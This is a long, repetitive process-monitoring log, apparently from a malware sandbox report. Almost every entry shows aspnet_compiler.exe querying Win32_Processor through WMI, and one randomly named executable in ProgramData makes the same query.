Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
